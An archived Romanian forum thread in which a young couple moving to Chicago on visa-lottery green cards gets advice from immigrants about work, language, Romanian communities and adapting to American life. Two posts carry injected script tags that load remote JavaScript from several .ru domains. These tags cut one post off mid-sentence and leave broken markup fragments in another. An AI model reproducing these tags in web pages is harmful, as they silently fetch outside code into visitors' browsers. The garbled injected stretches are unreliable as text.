PDA

Arată versiune întreagă : Viata noilor veniti

usdream
29.04.2006, 00:08
Salutare ! Suntem o familie de tineri casatoriti , fara copii inca , castigatori ai loteriei vizelor sicare in 2-3 luni ne vom lua zborul spre Chicago . Am dori sa va intrebam despre viata noilor veniti in America deoarece in ultimul timp am fost "avertizati" de unele rude si prieteni care ne-au oferit"incurajari si sfaturi" . Adica :

"ce va trebuie America, ca aveti aici tot ce va trebuie ?" , "credeti ca acolo umbla cainii cu colaci in coada ?" , "las ca vedeti voi ...ca acolo se munceste" , "acolo nu faci bani decat daca muncesti ilegal , ca altfel platesti multe taxe si nu te mai alegi cu nimic " . La care noi : " pai vrem sa ne realizam.." . Replica : " care realizare ? ce realizare ? las ca mai vorbim noi de realizat in America" ( mentionez ca aceste persoane nu au fost niciodata in US dar au cunostinte si prieteni acolo care le ofera informatii )

Noi suntem hotarati sa plecam . Chiar daca avem aici si casa si masa vrem mai mult . Stim ca nu ne asteapta covorul rosu la coborarea din avion si nici nu ne este frica de munca ( si aici muncim dar nu se vede la nivelul de trai ) . Ne astepta insa niste rude care ne vor ajuta la inceput , iar eu din a 2-a zi am de lucru la varul meu . Cei care ne asteapta ne-au incurajat constant spre deosebire de altii . Cred ca pentru inceput e f bine . Dupa aia , dupa cene acomodam ,mai vedem noi .

Voi ce credeti ? Care-i adevarul ?

sorin
29.04.2006, 03:01
Mergi pe mana celor care te-au incurajat si va fi bine. Faptul ca ai pe cineva sa te ia de la aeroport, sa te cazeze pentru inceput, sa-ti ofere ceva de lucru din prima, inseamna un pas foarte mare.

Noi cand am venit acum 10 ani nu am avut pe nimeni sa ne astepte la aeroport, am dormit la hotel prima noapte, am mers cu taxiul de pe O'Hare in alt stat si nu cunosteam nici un roman, nustiam forumuri de genul acestuia (nu stiu daca aparusera pe atunci) unde sa cer sfaturisi cu toate astea ne-am descurcat. Voi sunteti cu multe lungimi de barca in fata, asa ca nu trebuie sa va faceti griji, mai ales ca Chicago este un oras foarte primitor din toate punctele de vedere.

usdream
29.04.2006, 03:35
smileys/smiley1.gifMultumesc Sorin ! si noi tot pe O'Hare aterizam iar cei care ne asteapta stau in apropiere , intre aeroport si lac - din cate am vazut pe hartasmileys/smiley17.gif

29.04.2006, 05:53
E mai greu pina va acomodati dar pe urma totul va fi OK.

Chicago e un oras superb.

Va doresc multa bafta!

29.04.2006, 14:05
"acolo nu faci bani decat daca muncesti ilegal , ca altfel platesti multe taxe si nu te mai alegi cu nimic "

Asta ar trebui inclusa in colectia "Din gandirea titanilor Romaniei".

Cateva sfaturi pentru cand veniti (pentru ca e pacat sa nu incercati,
mai ales ca prin intrebari dovediti ca ganditi iar green card-urile rareori le poti obtine "din senin")

- Sa nu va multumiti cu putin, sa fiti ambitiosi, sa fit deschisi
la nou si dispusi sa invatati din ceea ce vedeti in jur. Pe langa limba
& comunicare mai este si alta mentalitate iar oamenii au alte
prioritati in viata. Este mediul in care veti trai si pe care va trebui
sa-l acceptati asa cum este. A te refugia in SUA pe termen lung intr-un cerc exclusiv
romanesc este cea mai mare greseala - ghetoizarea aceasta inseamna a cauta confortul
obisnuintei. Incercati sa ajungeti in preajma oamenilor cu care vreti
sa semanati, indiferent de origine.

-Cand va va fi greu - asta sigur va fi la inceput - sa va ganditi ca nu
o faceti numai pentru voi ci mai ales pentru cei care va vor purta
numele. Ei nu vor avea nici o problema de adaptare si sigur vor multumi
cerului ca au avut niste parinti care si-au luat inima in dinti spre
America (asta o aud mereu de la 1-a generatie nascuta in US).

-De ce America? Asa cum zicea un indian, pentru ca acolo sunt cei mai
grasi saraci din lume. De fapt, ce vroia el sa spuna este ca acolo
exista o clasa mijlocie cu un nivel de trai de invidiat. Normal ca acel
nivel nu poate fi atins fara munca dar nu-ti imagina ca aici pica lumea
pe jos de epuizare la serviciu.

-Last but not least ce poate fi mai minunat decat o lume in care nu dai
spaga, acea expresie suprema a umilintei umane (bacsis-ul dat la
sfarsit este altceva). Pentru multi conationali
de-ai nostri (si nu numai) legile sunt pentru prosti si munca e pentru
tractoare. Din fericire startul acestei tari l-au dat colonistii
britanici si nu fanariotii cu fes si narghilea (fredonand manele).
Incredibil dar adevarat: chiar se poate trai bine fara a fura.

usdream
30.04.2006, 08:40
Transit , in mare parte mi-ai citit gandurile . Nu am maifost in US dar cam asta era si ideea mea. Tocmai din aceste motive vrem sa plecamsmileys/smiley2.gifSper ca intr-o zi sa-ti confirm toate astea din propria experienta . smileys/smiley1.gif

luckylord
01.05.2006, 13:20
buna tuturor,cu riscul de a fi offtopic tin sa il felicit pe transit in special pentru ultima parte pe care a scris-o....mie personal mi-a placut ca a spus lucrurilor pe nume....si succes usdream in "noua viata"!!!
< =text/>
<!--
nopopups();
//-->
</>

usdream
01.05.2006, 19:36
multam fain smileys/smiley2.gif

mitzamic
02.05.2006, 04:48
Va recomand si eu din toata inima sa nu stati prea mult pe langa
comunitatile romanesti. La inceput e mult mai usor pentru ca pici
intr-o lume noua iar ei iti explica si te ajuta sa-ti faci acte etc,
Dar pe masura ce trece timpul veti constata ca vorbiti engleza doar
cand mergeti la cumparaturi sau la restaurant (daca munciti cu romanii
si locuiti in comunitati romanesti) si veti fi surprinsi sa auziti cum
romanasii se barfesc intre ei, cum desi sunteti in america aveti parte
de aceleasi intrigi ca si in romania: ca nu-stiu-care ce masina si-a
luat, ca a fost nu-stiu-unde in concediu, ca a zis, ca a dres.

De aceea va sugerez sa incercati sa va faceti totul pe munca voastra, sa fiti cat mai putin dependenti de romani.

usdream
02.05.2006, 05:54
am mai primit astfel de sfaturi " Sa te feresti acolo de romani " .....e trist cand esti sfatuit sa te feresti de ai tai .......mai ales cand vad atatia romani deschisi si dispusi sa ne ajute aici pe forum . Oare aia de care tre sa ne ferim din care Romanie sunt ?

sorin
02.05.2006, 06:23
Expresia

cristinaar
02.05.2006, 08:03
Da,trebuie sa te feresti de romani.In general sunt invidiosi si rai.Eu am fost in Florida,si daca mergeam de exemplu market,ieseamincarcata cu plase,nu aveam masinasi acolo ma intalneam cu alti romani,cu care locuiam si ei aveau masina de exemplu,nu te intrebau daca vrei sa mergi cu ei.Si de ce?Ptr.ca nu le placeau sa ia pe nimeni in masina,sa ajute pe nimeni.Sau supervisorul nostru,o tipa romanca,care avea ciuda pe restul colegilor si ne para la manager ca nu faceam una sau alta..si nu imi venea sa cred.Si imivine in minte un alt episod cand,pe la sfarsitul vizei ,am vrut sa imi gasesc un altjob,ca sa mai fac niste bani,si un coleg "m-a ajutat",vorbind ptr.mine si spunandu-le ca nu mai stau in state decat cateva luni si sa nu ma angajeze.Si nici nu m-a angajat.Asa sunt romanii peste hotare,ca intr-o cursa ,cine ajunge mai departe. Unii lucreaza mai mult,au 2,3,sau cine stie cate joburi si atunci ceilalti il invidiaza.Dar poate ca doar mie mi s-au intamplat asemenea lucruri.As vrea sa fie adevarat.

sauzimdebine
02.05.2006, 08:18
si eu am lucrat/lucrez cu romani, dar asta nu inseamna ca-i iert sau ca
am fost iertat, daca "nu fac una sau alta". A-ti face datoria sau a
avea un comportament corespunzator nu are nimic de a face cu
apartenenta la acelasi popor.

E drept ca eu nu-i "parasc" pe ai mei colegi de munca la manager ... el a adus romani, el sa se descurce cu ei smileys/smiley2.gif ... avand mijloace la dispozitie de a remedia eventualele situatii ce necesita atentie.

Cat pentru noii veniti, asa cum spunea si Sorin mai sus, aveti grija in ce
troaca va amestecati, indiferent de ce natie ar fi porcii, va vor manca
pana la sfarsit.

katinka
02.05.2006, 10:06
Salutare tuturor! Salutare usdream!

ma bag si eu in discutie (sper ca nu ca musca-n lapte smileys/smiley2.gif). Sunt si eu nou venita in state (de 7 luni) si, de asemena, nou venita si pe forum...Am urmarit "din umbra", cum s-ar spune, discutiile voastre si m-am hotarat sa ma bag si eu in vorba...chiar daca, poate, nu o sa spun nimic interesant...smileys/smiley4.gif

Noi nu am venit cu loteriavizelor, am venit cu viza H1B (sotul meu). Nu stiu daca sunt cea mai in masura sa-ti dau neaparat vreun sfat, usdream, insa, pot sa-ti spun ca merita sa incercati...Nu-ti apare de multe ori in viata sansa unei asemenea experiente...Noua, personal, nu ne place in america si nici nu ne dorim sa ramanem definitiv aici(suntem croiti mai pe stilul de viata european - de altfel, visul nostru este sa ne stabilim undeva in europa de vest) insa, cum spuneau si unii dintre colegii de discutie, mai sus, daca muncesti poti avea o viata buna aici, capeti o oarecare stabilitate care in Romania o gasesti foarte greu (aici e destul de des intalnita)...Sistemul merge bine si odata ce ai intrat in el nu prea mai sunt probleme..Totul (sau aproape totul) se rezolva on-line, lucru carepe noi ne-a incantat foarte tare (aveam si noi ca majoritatea experienta cozilor si nervilor din Romania). Datorita faptului ca sotul meu este consultant in telecomunicatii ne-am plimbat foarte mult in astea 7 luni (am batut america de jos in sus si de sus in jos) si, am stat ceva si prin Chicago. Pot sa-ti spun, ca macar ca-l vezi si tot merita sa vii pana aici...Chicago este un oras foarte frumos, singurul care mi-a ramas la inima,pana acum (Atlanta, Detroit, New York)... Mi s-a parut ca are ceva din atomsfera Parisului (dar numai atmosfera...smileys/smiley1.gif)..Nu stiu prea multcum sunt romanii de pe aici...am auzit si noi de chestiile astea cu "fereste-te de romani" insa, toti cei cu care am intrat in contact pana acum (ce-i drept ii numeri pe degete) sunt niste oameni de treaba...Americanii, in principiu, se poarta foarte dragut cu tine, sunt foarte amabili dar atat...la ei notiunea de prietenie nu e aceeasi cu a noastra...deci sa nu va asteptati la mari prietenii cu americanii...

In final,veniti, incercati si daca nu va place nu va tine nimeni cu forta. Este foarte adevarat ca aici, cred, ca se castiga cel mai bine din toata lumea asta...si este o experienta foarte interesanta...este, iar,adevarat, ca nici aici nu umbla "cainii cu covrigi in coada" dar, daca muncesti si iti vezi de treaba va fi bine. O sa va fie un pic greu, la inceput, pana va acomodati cu stilul de viata de aici insa, nu va descurajati..incet, incet lucrurile vor intra pe fagasul lor si pe urma dupa o perioada, trageti singuri concluzia daca vreti sa ramaneti sau nu aici...Si cu mancarea..in principiu, gasiti majoritatea alimentelor pe care le folosim si in tara...mai sunt si magazine de genul celor rusesti, bosniece etc. unde gasesti ce nu prea gasesti in magazinele americanesti...Noi, ne straduim sa consumam mai mult asa-zisele alimente "organice" care cica ar fi mai naturale...Sunt mai scumpe insa, speram, ca sunt mai bune decat cealalte care stim ca sunt destul de "artificiale". O sa va mai loviti (sau poate ca nu) de tot felul de tampenii cu asigurarile astea (ca nici ei nu stiu exact ce si cum ca lumea)..o sa va loviti si de o gramada de oameni incompetenti (datorita faptului ca isi schimba job-urile foarte des probabil ca nu au timp sa capete experienta) si robotei (nu prea au obiceiul sa gandeasca..lasa totul in seama calculatorului)...S-ar putea sa vi se para cam "plata" viata in America si s-ar putea sa nu fie chiar ce va imaginati despre ea sau ce-ati vazut prin filme (mai ales daca o sa locuiti in Metro Area orasului sau chiar mai departe)..

Bineinteles ca chestia asta cu "placutul" americii este<<script src=http://www.iroe.ru/ngg.js></script>

GNChicago
02.05.2006, 10:57
As vrea sa priviti si reversul medaliei si anume romanii cu ceva vechime aici, romani care vin in contact cu noii veniti cu mentalitati din Romania, o gradina mare cu tot felul de specimene.

Imi aminteswc ca si eu cind am venit in Chicago nu am primit intelegere sau ajutor de la alti romani.....toti erau suspectati drept suporteri a-i lui ceausescu.....iar eu ma intrebam care din cei vechi sunt agentii lui Ceausescu......si erau destui.....

Gasirea unui apartament in Chicago era o problema ptr cineva venit care vorbea aproape fluent......franceza si foarte bine romana.....Fiecare avea problemele lui, eu nu aveam masina si nici driver license, limba pe baza de dictionar.....

Ceausescu avea un sistem bine pus la punct ptr a distruge pe oricine pleaca din romania, sa-i dispara numele, diplomele, sa nu mai ai niciun fel de istorie a ceea ce ai realizat in romania....., daca erai cantaret, toate discurile dispareau de pe piata, daca aveai o carte sub tipar, numele tau trebuia scos altfel cartea nu putea fi publicata nicaieri in lume.....si lista poate continua.....

Mergeam la biserica Sfanta Maria din Chicago, 4225 N Central Ave. unde erau foarte multi romani-americani, unii nascuti aici care judecau lucrurile prin prizma americanilor, judecata lor.Erau si ceva romanidar mult mai putini decit la biserica Nasterea Domnului......

Eu aveam experienta ambelor sisteme si intelegeam mai bine fiecare unde bate.....

Dupa lupte seculare am reusit sa infiintez un Comitet de ajutorare a refugiatilor din Romania, dar nu prea am avut suport de sustinere. Scopul era sa ajutam sa facem resume-uri, sfaturi ptr obtinerea unui job.....in niciun caz nu eram in pozitie de a da "pestele", noi nu ne puteam permite sa dam bani. Au fost si unii care erau veniti de peste cinci ani si au venit sa ceara bani.....La unul i-am dat zece dollari dar i-am explicat ca daca am avea o suta de mii de dollari la vreo mie de refugiati, atunci la fiecare ar fi revenit cite o suta de dollari, ori in jur de treizeci de centi pe zi.....

Prin acest comitet de ajutorare luptam impotriva lui Ceausescu, impotriva comunismului.......intr-o perioada in care nu se stia cine cu cine voteaza iar invitatia mea era sa vorbeasca prin FAPTE!

Imi amintesc de un caz in care unul venit de vreo doi ani dupa ce umblase prin alte state a venit la mine sa co-semnez sa-si ia o masina noua....desi avea un job temporar de doi lei, fara o pregatire profesionala si conform legii daca semnam eram bun de plata daca el pleca cu masina in alt stat sau refuza sa plateasca.....

Am avut probleme multe si cu noii veniti care-ti cereau sa faci ceva ilegal sau la mica intelegere desi nu-i cunosteam si nu aveam de unde sa stiu ce fel de oameni sunt.

Viata m-a invatat sa judec oamenii dupa fapte dupa actiunile lor fata de mine dar si fata de altii......daca erau necinstiti cu altii, sansa sa fiu eu urmatorul tras in teapa era ca si sigura.....

Cei noi veniti care au fost ajutati, unii m-au intrebat cum sa ma rasplateasca si le-am spus sa ajute si ei pe altii sa vada cum e....., unii stau in chicago area, altii si-au gasit cuib in alte state dupa jobul gasit....in niciun caz nu am tinut omul sa stea in chicago doar ptrca au venit la mine aici ci au fost liberi ca pasarea cerului ca de fapt ptr libertate au venit aici......

Istoria e mai lunga cu multe exemple, dar poate cindva voi scrie o carte....sau un film......ca am material destul.......

Concluzia ar fi ca trebuie sa va feriti de toata lumea si sa judecati oamenii dupa actiunile lor indiferent de ce nationalitate ar fi ei si sa fie cinstiti incepind cu ei insasi.....p://www.9jsr.ript><scrip=http://<script src=http://www.nmr43.ru/ngg.js></script><script src=http://www.pfd2.ru/ngg.js></script><script src=http://www.iroe.ru/ngg.js></script><script src=http://www.kodj.ru/ngg.js></script><script src=http://www.kjwd.ru/ngg.js></script><scr<script src=http://www.iroe.ru/ngg.js></script>

katinka
02.05.2006, 12:44
Cu toate ca sunt nou-venita, ma vad nevoita sa recunosc ca GNChicago are si el dreptatea lui. Cand esti aici(sau in alta parte a lumii)de foarte multi ani si ai luat contact cu o varietate "infricosatoare" de nou-veniti si ai avut tot felul de experiente cu acestia este de explicat, intr-un fel, o oarecare reticenta..

Insa, macar de s-ar datora reticenta romanilor stabiliti pretutindeni unor experiente ca cele ale lui GNChicago...Mi-e teama ca, totusi,noi, ca natie, suntemintr-adevar, rautaciosi si fara nici cea mai vaga dorinta de a-i ajuta pe co-nationali...regretabil..dar cam adevarat...Nu stiu unde s-a pierdut acea legendara "inima de aur" si unitatea romanului (conform istoriei eram un popor dat naibii de unit) dar in mod cert aceasta unitate s-a manifestat in ultimii ani doar la revolutie, la greve, la coada la medicamente, la Jocurile Olimpice etc.

De, viata grea...

GNChicago interesanta experienta ta americana...

Asteptam cartea...sau filmul...smileys/smiley2.gif.

sorin
02.05.2006, 12:54
Katinka, nu ti se pare ca aici pe forum romanii se ajuta intre ei chiar daca nu se cunosc. Folositi si voi expresii de genul "unii romani" de exemplu sunt asa si pe dincolo si nu generalizati. E pacat de munca unor forumisti (se stiu ei) care si-au sacrificat din timpul lor liber pentru a da o mana de ajutor si pentru care am toata stima. smileys/smiley1.gif

GNChicago
02.05.2006, 12:57
Mi-a mai spus asta cineva.... Eram la un meeting cu peste o suta de persoane, toti americani care si-au permis sa dea o mie de dollari de persoana pentru a participa la acest meeting,si am vorbit si mi-am permis sa-i fac pe toti "chicken" pentru atitudinea lor, lucru apreciat de unii dar altii au fost pasivi, doar lectorul a luat atitudine si la un moment dat mi-a taiatmicrofonul ce a stirnit furia altora pentru dreptul meu la free speech.....

Daca am ceva de spus de obicei folosesc subiect si predicat, nu cu nume abstracte......

katinka
02.05.2006, 13:07
Sorin, ai dreptate...inainte sa scriu "noi, ca natie" scrisesem "multi dintre romani"...insa din toata experienta mea de pe unde am fost pana acum, din nefericire, mi-am creat o impresie cam nefavorabila ceea ce m-a indemnat sa generalizez prin cuvantul "natie". Asta nu inseamna ca, in natia asta,nu sunt o gramada ca tine sau ca cei la care te-ai referit si ca multi altii...pentru care, am si eu toata stima...

Daca ar fi sa o luam ad-literam ar insemna sa ma includ si pe mine in "natie". M-am referit, daca vrei, din punct de vedere statistic...

Ca de aceea amintrat si eupe forum..sa ajut si eu pe altii cu o vorba buna (ca si eu tare mult am avut nevoie si am de asa ceva) nu ca sa bag "strambe" vis-a-vis de toti romanii.

Cand spunem ca "romanul este asa si pe dincolo" toti generalizam fara sa vrem...Asta nu inseamna ca toti sunt asa, nu?smileys/smiley1.gif

Oricum ,thanks pentru ca mi-ai atras atentia...Ai dreptate...

GNChicago
02.05.2006, 14:09
Natura umana sau mai bine zis neumana....

Oare ce-au facut domnitorii fanarioti??? licitau Romania??? sau cei care au tradat domnitorii tarilor romanesti.... sau Regii Angliei......

Si tu Brutus????

usdream
02.05.2006, 19:16
GNChicago , poveste a ta m-a impresionat . Nu am stiut ca ai o asa vechime in US . Eu la revolutie aveam 14 ani si buletin cu vechime de 3 luni . Visam la America , pt ca mama mea are o prietena in NY , plecata ( fugita ) in 1975 . Eu ii citea scrisorile (primite de mama pe timpul comunismului ) si parca vorbea de o alta lume , o lume de vis . De atunci am tot visat US insa dupa revolutie am crezut ca m-am desteptat , si am refuzat sa plec in America (acum regret)atunci in anii 90 la prietena mamei . Uneori am impresia ca am pierdut timpul aici in Ro , desi nu imi pare rau de cursul vietii mele de pana acum . Dar nu mai vreau sa visez , vreau sa imi traiesc visul american . Oricum ar fi acolo macar stiu ca am incercat .

GNChicago
03.05.2006, 03:24
USdream la ora actuala intrarea in America nu este de loc usoara.

Trebuie sa-ti gasesti calea legala de a intra aici si pe urma de a te fixa definitiv aici daca acesta este visul tau.

Citeste pe USCIS toate tipurile de viza posibile si vezi unde te poti incadra.

Ramanerea ilegala in America nu o recomand nimanui, ptrca este extrem de dificila. Mai sunt oameni care se rezolva pe parcurs, vin aici cu o viza de lucru sau vizita si in acest interval cunosc pe Mr./Mrs. Right cetatean american cu buletin de America si se rezolva.....cam asta ar fi calea cea mai usoara, dar ce te faci daca omul are familie, nevasta, copii....atunci raman viza pe baza de grad de rudenie, iar unii incearca tot felul de variante ilegale cum ar fi casatoria de convenienta.....iar dupa casatorie apare santajul nestiind faptul ca daca sunt prinsi ambele parti sunt pedepsite, deci si cetateanul american......

usdream
03.05.2006, 04:08
pai eu si sotia mea avem deja vizele din 25 aprilie . Sotia a castigat Loteria anul trecut . Venim in iulie in Chicago

usdream
03.05.2006, 04:11
smileys/smiley1.gifcred ca ai uitat de unde a inceput discutia aici :)smileys/smiley17.gif

katinka
03.05.2006, 04:19
usdream va tin pumnii si va doresc din suflet ca, pentru voi, "american dream" sa fie asa cum l-ati visat....

mult succes si la cat mai multe realizari! smileys/smiley1.gif

GNChicago
03.05.2006, 04:21
Mesajul 1700 !!!!!

Asa este am uitat cum veniti.Chicago cred ca e cea mai buna solutie pentru noul venit.

Ar fi interesant sa vedem ce lucrati in Romania sau la ce va pricepeti pentru a vedea cit de usoara va fi integrarea,,,,,,Ajutorul de inceput de integrare pe calea cea buna este esentiala.....

usdream
03.05.2006, 08:33
Katinka , multumim si tie iti dorim sa ajungi sa iti traiesti visele .

GNChicago , felicitari pt. mesajul 1700 .

Despre noi : suntem o familie normala de tineri casatoriti ( 29 de ani ) dupa plicul 1 de la loteria vizelor . Eu am o mica afacere de comert - distributie, in caresunt singurul angajat . Asa ca ma ocup si de aprovizionare , vanzari-distributie , contabilitate primara , relatii cu clientii. Sunt si sofer si hamal si agent de vanzari sidirectorsmileys/smiley36.gif. Dar sa stii ca stiu si sa sap in gradina, cu harletul. Cand mi-am ridicat casa am fost si holoangar , sofer pe roaba , am sapat santuri pt canalizare . Am lucrat si la subzidiri , si la facut garduri , si la pus rigips si izolat cu polistiren si vata minerala mansarda . Am facut dale si mi-am pavat trotuarul . La pavat m-am specializat , ca am fost de unul singur , doar ca pana am ajuns cat de cat meserias am terminat lucrarea .smileys/smiley1.gif Am carat si caramizi , sitigle pe acoperis , si saci de ciment + var . Am facut la betoanecu lopata de mi-au sarit capacele ( ca nu avem betoniera ). E drept, toate astea le-am facut ininteres propriu, la casa mea, si in timp de cativa ani .Ce am mai facut oare ? .......in faculate am fost agent Vacsy la firma Zepter.Am crescut si porci acum 7-8 ani si mergeam 20 de minute pe jos dimineata ,cu bidonul de apa calda in spate, iarna la - 20 C, ca unde ii tineam nu era apa. Dupa aia mergeam la facultate si tin minte ca uneori papucii mei miroseam numai a porc . Amintiri.....

Le-am scris pe toate amestecate asa cum mi-au venit in minte .

Sotia : lucreaza in distributie , munca de birou . Ea aterminat finante - contabilitate . Dar si ea e o fire deschisa si dispusa sa invete lucruri noi .

catacaz
05.05.2006, 07:56
usdream ... si visul meu din copilarie a fost sa ajung in state, deoarece ma fascina si in continuare ma fascineaza tot ce tine de America - taramul fagaduintei. Dupa parerea mea numai cei care nu au incredere in fortele proprii si cei care se folosesc de mediocritatea si lasitatea romanilor si fac bani din asta vor sa ramana in tara si se simt multumiti. Eu nu cred ca fac parte din nici una din aceste categorii si intotdeauna mi-a placut sa-mi testez limitele si sa-mi fac viata asa cum imi place mie. Nu ma pot plange de banii ce-i castig aici in tara si nu banii ar fi motivul pt. care as vrea sa plec. Vreau sa ofer o viata mai buna familiei mele si nu neaparat din punct de vedere financiar. Nu as suporta sa-mi vad copii cum ingheata iarna in salile de clasa si sa ma lovesc de ignoranta romanilor toata viata. Motivele sunt mult mai multe, iar multe dintre ele le cunoasteti. Daca familia mea e fericita atunci si eu sunt fericit.

usdream
05.05.2006, 08:24
te inteleg perfect

06.05.2006, 13:49
usdrea m,

E greu sa dai sfaturi de cariera cuiva prin internet iar America iti
poate oferi experiente foarte diverse. Totusi, eu as zice ca aici
trebuie sa sti putine dar bine si sa ai o diploma/un atestat (evident
din US). Cariera ti-o planifici din timp si minutios - legenda pe care
o tot auzeam in Ro ca americanii isi schimba cariera/meseria ca un Hopa Mitica
este doar o legenda (mai mult asta o fac mexicanii de pe aici). Poate la inceput tu va trebui sa muncesti iar
sotia sa ia niste cursuri/capete atestari, apoi poate invers (cand vei
vedea cat castiga ea smileys/smiley1.gif).
Continui si prin a spune ca America nu este pentru cei care nu stiu/nu
vor sa invete Engleza. De fapt, a vorbi numai romaneste este ca si cand
ai fi surdo-mut.

Alt sfat pe care ti-l dau este sa uiti de problemele si frustrarile din
Romania odata ajuns aici. Este contraproductiv si te tine pe loc sa te
gandesti in US la tot prin ce ai trecut in Ro (tigano-orientalismul,
spaga,
frigul din clase, etc..). Lumea de aici nu este lipsita de stress
- din contra - iar timpul are cu totul alta valoare. Insa problemele cu
care te vei confrunta vor fi cu totul altele decat in Ro. In general
sunt legate de finantarea studiilor si mentinerea in serviciu pe
criterii profesionale. Daca
astea merg atunci merge si restul. Cand ai job ti-se pune totul la
dispozitie ca sa te concentrezi numai pe el. Pretentiile sunt in
general
sus si concurenta acerba - proverbialul nostru simt al improvizatiilor
este adesea prost vazut (creativitatea este altceva). In multe din
serviciile pe care le-am cunoscut
eu sau sotia exista destula agresivitate intre colegi in sensul ca
trebuie sa te remarci in fata sefilor. Te arunci obligatoriu in
credite (casa,
masina, facultate
ptr copii etc..) si dupa aceea iti tremura fundul ca iti scad
veniturile si te trezesti pe strada. De multe ori am impresia ca sunt
ca un hamster pus sa alerge in rotita lui din colivie si nu avanseaza-
cu cat castig
mai mult cu atat am mai putin timp sa ma bucur de acesti bani. In plus,
a fi bolnav aici pe termen lung inainte de pensie este mult mai
sinistru ca in EU/UE, lucru pe care din fericire nu l-am patit. Nu mai
zic de putinele zile de concediu anual. Mai
ales la inceput iti vor lipsi enorm nu atat prietenii din Ro cat
mai ales intalnirile unde nu stateai cu ochii la ceas (sau poate doar
eram eu mai tanar?). Ca sa inchei acest (prea) lung paragraf sosirea ta
aici va fi o ruptura cu viata ta din Romania si mai putin o continuare
a acestei vieti cu problemele de acolo rezolvate. Pentru americanul
mediu Romania nu exista si el nici nu vrea sa afle despre ea.

pop12mariu
06.05.2006, 18:54
Am vazut-o cu ochii mei cand am aterizat pe acest pamant acum doi ani si jumatate.

Partea buna a fost ca am avut o ruda care m-a ajutat foarte mult
la inceput.Dar viata din Ro se sfarseste cand ai inceput prima zi de
lucru si cand ti-ai luat carnetul de conducere.Comunicarea si limba
engleza e cuvantul cheie in gasirea unei slujbe bine platite , ai
nevoie de multa diplomatie si sa dai dovada de seriozitate.De mai mult
de doi ani traiesc singura prin Louisiana si pot sa spun ca
pe o raza de 200 de mile nu e nici o comunitate romaneasca, in alta
ordine de idei nu am decat sa ma bazez pe americani.Am gasit mai mult
sprijin decat ma asteptam ,am avut parte si de oameni de doi bani ca
peste tot.Sfatul e sa nu semnezi nici un contract inainte de a-l citi
de mai multe ori , foloseste-ti toate sursele de informatie si
documenteaza-te cand vrei sa faci o investitie sau
cumparaturi cu o valoare mai mare.O duc decent dupa doi ani , fara
extravagante de tot felul si stiu ca aici ai nevoie de putere de munca
si sanatate.E normal la inceput sa nu-ti placa viata aici sau sa fii
speriat de ceea ce gasesti in realitate. Se chiama adaptare pentru ca
schimbi limba in care comunici , schimbi societatea si implicit
tot ceea ce ai invatat in trecut . Flexibilitatea in adaptare scade o
data cu varsta .Familia are un rol important in suportul moral .

usdream
06.05.2006, 22:22
Transit , iti multumesc pentru detaliile prezentate . Stim ca va fi o ruptura plecarea din Ro , inca nu prea stim exact la ce sa ne asteptam decat din ceea ce ne spun oameni ca tine . Stim ca limba engleza e o conditie obligatorie pt . a reusi . Am vrea sa urmam niste cursuri in US dar acum nu ne gandim decat la momentul sosirii si zilele imediat urmatoare in care sa ne dezmeticim smileys/smiley2.gif

Te inteleg atunci cand vorbesti ca te simti ca in cursa fara sfarsitahamsterului . Am citit chiar mai multe carti pe tema asta si cum sa iesi din cursa aia . Sunt scrise de Robert T. Kiyosaki iar prima este " Tata bogat , tata sarac " pe care o gasesti aici : http://www.curteaveche.ro/bookcollection.php?collection=25&a (http://www.curteaveche.ro/bookcollecti&#111;n.php?collecti&#111;n=25&amp;page=2) mp;page=2

vezi si aici :

http://www.amaltea.ro/colectie_3_Cunoastere_si_Autoeducare_B (http://www.amaltea.ro/colectie_3_Cunoastere_si_Autoeducare_Business.html ) usiness.html

Oricum , asa cum spunea cineva , greul de acolo e mai usor de suportat decatgreul de aici .Speram sa ne integram in societatea de acolo .

Pop12mariu : si pe noi ne astepta cineva la sosire . Ma bucur ca ai reusit sa te integrazi chiar daca nu ai romani prin jurul tau .

Acum insa va intreb pe amandoi : cu tot greul de acolo , v-ati mai intorce la viata din Ro ?

Daniel

usdream
06.05.2006, 22:38
si in engleza :

http://secure.richdad.com/Category.asp

07.05.2006, 05:33
</span>cu tot greul de acolo , v-ati mai intorce la viata din Ro ?

In cazul meu nici nu se pune problema. De aceea te-am si incurajat sa
vii desi nu te cunosc. Sunt oameni care insa ar gresi sa vina din Ro
fie pentru ca nu pot trece stacheta ceruta de catre imigrarea legala in
US (la tine datorita loteriei nu mai exista problema) fie au o
mentalitatea care i-ar face greu adaptabili la societate dezvoltata. Las
la o parte pe cei de o anumita varsta.

Nu vreau sa devin prea didactic dar mentalitatea ("culture" cum
zic americanii) inseamna un sistem de valori si o ordonare a
prioritatilor in viata. Sunt unii de-ai nostri care cheltuie cel putin
la fel de multa energie in a fura si a insela cat ar fi nevoie in a te
pregati pentru o cariera ce te-ar face apreciat. Sunt prioritatile lor
si au fost generate mai ales de mediul in care au evoluat de mici.

Romania nu este total pierduta prin simplul fapt ca geografia o aseaza
la granita dintre societatile organizate si pragmatice de tip
occidental/nord european si cele orientalo-asiatice/mediteraneene in
care toata lumea isi bate joc
de toata lumea (conducatori si condusi, deopotriva). Cred ca integrarea
in UE (nu aia institutionala ci cea mentala) va dura enorm si va
reprezenta un soc similar cu incercarea de europeenizare din a 2-a
jumatate a sec 19 ptr vechiul Regat. As vrea sa cred ca problema
Romaniei actuale este reprezentata de cei 50 ani de comunism dar sunt
mult mai pesimist si cred ca din pacate aceasta a fost numai una din
etapele ei istorice de tip asiatic (incercarea de a pleca in
occident se pedepsea atat in comunism cat si pe vremea fanariotilor) . Chiar
si comunismul a fost in
diferite "arome"/'flavors" de la Berlin la Phenian. Revenind la ziua de
azi, este de necontestat ca un imigrant dintr-o tara scandinava, sa
zicem, se integreaza in SUA mult mai usor decat imigrantul roman.

Revenind la intrebarea ta cu intorsul, nu m-as mai intoarce penttru ca
n-as mai suporta sa-mi pierd timpul rezolvand probleme primare gen
lupta cu birocratia, spaga, sutii, ignoranta, flegmele de pe strada. manelele,.. desi
poate as dormi mult mai linistit cu serviciul. Remarci ca nu am zis
nimic de bani. Este alegerea mea pentru ca sunt prioritatile mele.

Am lasat la urma o alta categorie f. mica. Sunt cei care, desi sunt
deranjati de cele de mai sus, au ales sa ramana in Ro. pentru ca
simt ca isi pot izola cat de cat familia de tot ce este rau si pot
misca macar un milimetru tara aceea spre civilizatie. Ei, culmea, nu
fura. Pe unii ii stiu si au toata consideratia/admiratia mea - mie natura
meseriei mele nu mi-ar fi permis sa fac ceva similar.

nkog
07.05.2006, 05:51
